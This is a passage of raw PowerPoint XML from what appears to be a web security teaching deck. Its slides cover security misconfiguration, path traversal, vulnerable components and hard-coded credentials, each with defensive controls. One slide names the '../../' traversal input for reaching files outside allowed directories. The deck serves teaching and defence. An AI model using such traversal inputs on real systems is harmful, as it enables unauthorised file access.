          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29708" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{156DABD3-2255-4C11-9435-BE1A931C8F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4724400" y="4572000"/>
            <a:ext cx="3505200" cy="30480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29709" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32BFBDDF-7049-4273-8758-382CEE0D175C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-249363">
            <a:off x="5095875" y="4437063"/>
            <a:ext cx="2190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a:t>Form with fake data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29712" name="Line 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{928DEF62-A7D7-489B-ADEC-855B0B3E2750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2743200"/>
            <a:ext cx="0" cy="33528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9713" name="AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7924E77-3D76-406B-AAA5-3CC9A31AA400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="3962400"/>
            <a:ext cx="533400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 32143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7C80"/>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1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E0D1FD-9559-4527-8A95-4EE041B06CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419601" y="2042641"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28853398-8DE2-4F93-9BCB-6A8CDD3057FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7681387" y="1671074"/>
            <a:ext cx="1096427" cy="4125451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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D4E8F-499B-4437-8BB6-7414C2FC952B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="808038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18008101-6680-4994-88DF-B6503C27B424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks or Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B94E8A2-E47D-4EDD-A465-7524C3C80482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other vulnerable software installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software is not patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud configuration not secured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default accounts exist with known passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flexible configuration (re: security, file locations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error handling offers information (stack traces)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5233862B-8C37-4DB7-9625-D8ED529EFAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0E3171-C782-49E8-824F-3ABB71574612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A documented, thorough hardening process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimal platform with no extra apps, features or documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement (or provide) security configuration and patching documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automate vulnerability testing to regularly ensure proper configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 18" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69035EA-5A77-4451-989E-C654EC7015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164" y="1070393"/>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8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12534FF1-96CF-468C-8036-6F1CB51E7B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4719" y="1040605"/>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8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B2DCE1-6A2D-4FC0-BC77-5A7C4EB37F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1237" y="1040606"/>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85412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E95D2563-2E0C-48B1-8349-5C6D0BF25B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6747B6A-9B2E-44BA-A834-C0F66F964AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="2743200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Navigate to a URL directly instead of through proper means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Attacker can insert ../../ and access files outside privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Search directories, reverse engineer code </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Control:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Allow only certain files to be visible; never directory access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Run as low-privilege user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Provide fixed input values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Run code in ‘jail’: Unix chroot jail and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>AppArmor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6094E3BA-BA66-48B5-A11C-AB95746EBAE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="8153400" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1D1FF"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Submit File:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Enter pathname:                   Browse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18385D0E-C099-468B-AB1A-FD02CD844B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="5562600"/>
            <a:ext cx="914400" cy="381000"/>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52233" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59FCB42-37B4-41BB-A20A-D404D1D8346C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="5562600"/>
            <a:ext cx="10668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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Browse</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F91E1A0-4E02-4B67-9950-C043AD0F5CDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="593308"/>
            <a:ext cx="8229600" cy="824330"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C69F4D-7926-4923-A79C-10A730560CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01C2B376-43C3-4A1E-BED6-F502C091258C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software is vulnerable OR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>patches out of date OR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code not maintained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Poor testing of patched code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA557060-0A28-484D-8B4C-698E6E80930B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E093B064-1D58-42C9-B3D5-D7CE5DF754D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Know current versions of all component software, rebuild and patch regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Obtain software from official sources, verifying integrity checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Monitor security bulletins for the components you use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Monitor OS, database, web software, libraries, app components used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 13" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0338C473-8142-41AF-B608-EEE2D05A6E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663575"/>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3" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C637F604-8F2F-4C07-B6E3-92B7CC0CB5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6700" y="687179"/>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3839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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9430ECE-6DBC-47A1-81B0-4B446639EA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Other software problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7CA7FF3-13EE-45D7-AA08-B3BEA1A75BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Use of hard-coded credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Missing encryption of sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
